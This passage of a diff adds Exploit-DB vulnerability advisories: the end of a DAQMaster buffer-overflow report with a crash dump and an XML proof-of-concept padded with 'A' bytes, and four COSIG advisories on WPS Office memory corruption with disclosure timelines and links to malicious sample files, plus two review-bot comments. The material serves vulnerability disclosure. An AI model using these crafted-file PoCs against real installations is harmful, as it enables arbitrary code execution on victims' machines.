+processing of a project file, which can be exploited to cause a
+buffer overflow when a user opens e.g. a specially crafted .DQP
+project file with a large array of bytes inserted in the 'Description'
+element. Successful exploitation could allow execution of arbitrary
+code on the affected machine.
+
+---------------------------------------------------------------------
+
+(ee8.1ee8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=41414141 ebx=57010748 ecx=02bb9a00 edx=00808080 esi=00000001 edi=00000001
+eip=00405d45 esp=0018f59c ebp=0018f91c iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+DAQMaster!TClsValueListShowData$qqrp16GraphicsTBitmapip10TPropValuei+0x41d:
+00405d45 8b10 mov edx,dword ptr [eax] ds:002b:41414141=????????
+
+---------------------------------------------------------------------
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5302
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php
+
+
+20.11.2015
+
+--
+
+
+thricer.dqp project PoC:
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39393.zip
+------------------------
+
+
+
+
+ Noname
+
+
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[n]
+ C:\Users\zslab\Documents
+ 0
+
+ 0
+ 0
+
+ 0
+
+
+
+
+
+ DAQ WorkSpace
+
+
+
+
+
diff --git a/platforms/windows/dos/39395.txt b/platforms/windows/dos/39395.txt
new file mode 100755
index 000000000..8ad9627b7
--- /dev/null
+++ b/platforms/windows/dos/39395.txt
@@ -0,0 +1,71 @@
+#####################################################################################
+
+Application: WPS Office
+
+Platforms: Windows
+
+Versions: Version before 2016
+
+Author: Francis Provencher of COSIG
+
+Twitter: @COSIG_
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
+
+suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
+
+WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
+
+The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
+
+(https://en.wikipedia.org/wiki/WPS_Office)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-11-24: Francis Provencher from COSIG report the issue to WPS;
+2015-12-06: WPS security confirm this issue;
+2016-01-01: COSIG ask an update status;
+2016-01-07: COSIG ask an update status;
+2016-01-14: COSIG ask an update status;
+2016-01-21: COSIG ask an update status;
+2016-02-01: COSIG release this advisory;
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+The specific flaw exists within the handling of a crafted PPT files with an invalid value into “texttype” in the “clientTextBox”
+into a “DrawingContainer”. An heap memory corruption occured and could allow remote attackers to execute arbitrary code
+on vulnerable installations of WPS. User interaction is required to exploit this vulnerability, the target must open a malicious file.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-04.ppt
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39395.zip
+
+###############################################################################
diff --git a/platforms/windows/dos/39396.txt b/platforms/windows/dos/39396.txt
new file mode 100755
index 000000000..cbaff972e
--- /dev/null
+++ b/platforms/windows/dos/39396.txt
@@ -0,0 +1,73 @@
+#####################################################################################
+
+Application: WPS Office
+
+Platforms: Windows
+
+Versions: Version before 2016
+
+Author: Francis Provencher of COSIG
+
+Twitter: @COSIG_
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
+
+suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
+
+WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
+
+The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
+
+(https://en.wikipedia.org/wiki/WPS_Office)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-11-24: Francis Provencher from COSIG report the issue to WPS;
+2015-12-06: WPS security confirm this issue;
+2016-01-01: COSIG ask an update status;
+2016-01-07: COSIG ask an update status;
+2016-01-14: COSIG ask an update status;
+2016-01-21: COSIG ask an update status;
+2016-02-01: COSIG release this advisory;
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+
+
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
+User interaction is required to exploit this vulnerability, the target must open a malicious file.
+The specific flaw exists within the handling of a crafted DOC files with an invalid value into the “OneTableDocumentStream”
+data section causing a stackbase memory corruption.
+###############################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-05.doc
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39396.zip
+
+###############################################################################
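Review bot: The affected-version line `Versions: Version before 2016` leaves it open whether WPS Office 2016 fixes this DOC parsing issue or was simply not tested, and neither the timeline nor the technical section resolves that. The two sibling advisories in this commit (39397, 39398) list `Version 2016` as affected, so a reader cannot infer a fixed version by comparison. A sentence such as `Not reproduced on Version 2016; unknown whether the root cause is addressed there` under Technical details would let readers triage their installations correctly. The closing separator on the Technical details section is also shorter than the ones used elsewhere in the file, which is cosmetic but worth aligning.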
diff --git a/platforms/windows/dos/39397.txt b/platforms/windows/dos/39397.txt
new file mode 100755
index 000000000..65057291d
--- /dev/null
+++ b/platforms/windows/dos/39397.txt
@@ -0,0 +1,71 @@
+#####################################################################################
+
+Application: WPS Office
+
+Platforms: Windows
+
+Versions: Version 2016
+
+Author: Francis Provencher of COSIG
+
+Twitter: @COSIG_
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
+
+suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
+
+WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
+
+The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
+
+(https://en.wikipedia.org/wiki/WPS_Office)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-12-31: Francis Provencher from COSIG report the issue to WPS;
+2016-01-04: WPS security confirm this issue;
+2016-01-14: COSIG ask an update status;
+2016-01-21: COSIG ask an update status;
+2016-02-01: COSIG release this advisory;
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
+User interaction is required to exploit this vulnerability in that the target must open a malicious file.
+
+The specific flaw exists within the handling of a crafted Presentation files with an invalid “Length” header in a drawingContainer.
+By providing a malformed .ppt file, an attacker can cause an memory corruption by dereferencing an uninitialized pointer.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-06.ppt
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39397.zip
+
+###############################################################################
diff --git a/platforms/windows/dos/39398.txt b/platforms/windows/dos/39398.txt
new file mode 100755
index 000000000..30b81133a
--- /dev/null
+++ b/platforms/windows/dos/39398.txt
@@ -0,0 +1,70 @@
+#####################################################################################
+
+Application: WPS Office
+
+Platforms: Windows
+
+Versions: Version 2016
+
+Author: Francis Provencher of COSIG
+
+Twitter: @COSIG_
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
+
+suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
+
+WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
+
+The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
+
+(https://en.wikipedia.org/wiki/WPS_Office)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-12-31: Francis Provencher from COSIG report the issue to WPS;
+2016-01-04: WPS security confirm this issue;
+2016-01-14: COSIG ask an update status;
+2016-01-21: COSIG ask an update status;
+2016-02-01: COSIG release this advisory;
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
+User interaction is required to exploit this vulnerability in that the target must open a malicious file.
+By providing a malformed .xls file, an attacker can cause an heap memory corruption.
+An attacker could leverage this to execute arbitrary code under the context of the WPS Spreadsheet process.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-07.xlsx
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39398.zip
+
+###############################################################################
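Review bot: The technical details say the crash is triggered by a malformed `.xls` file, but the PoC link points to `COSIG-2016-07.xlsx`; BIFF (.xls) and OOXML (.xlsx) go through different parsers, so this mismatch matters for anyone writing detection or assessing which code path is affected. Either the sentence or the link extension is wrong, and the advisory should state which format the sample actually is. Consider changing the sentence to `By providing a malformed .xlsx file, …` if the linked sample is genuinely OOXML, or correcting the link otherwise. Unlike the other three advisories, this one also names no specific structure or field as the trigger, so a one-line pointer to the affected record or part would make the report actionable.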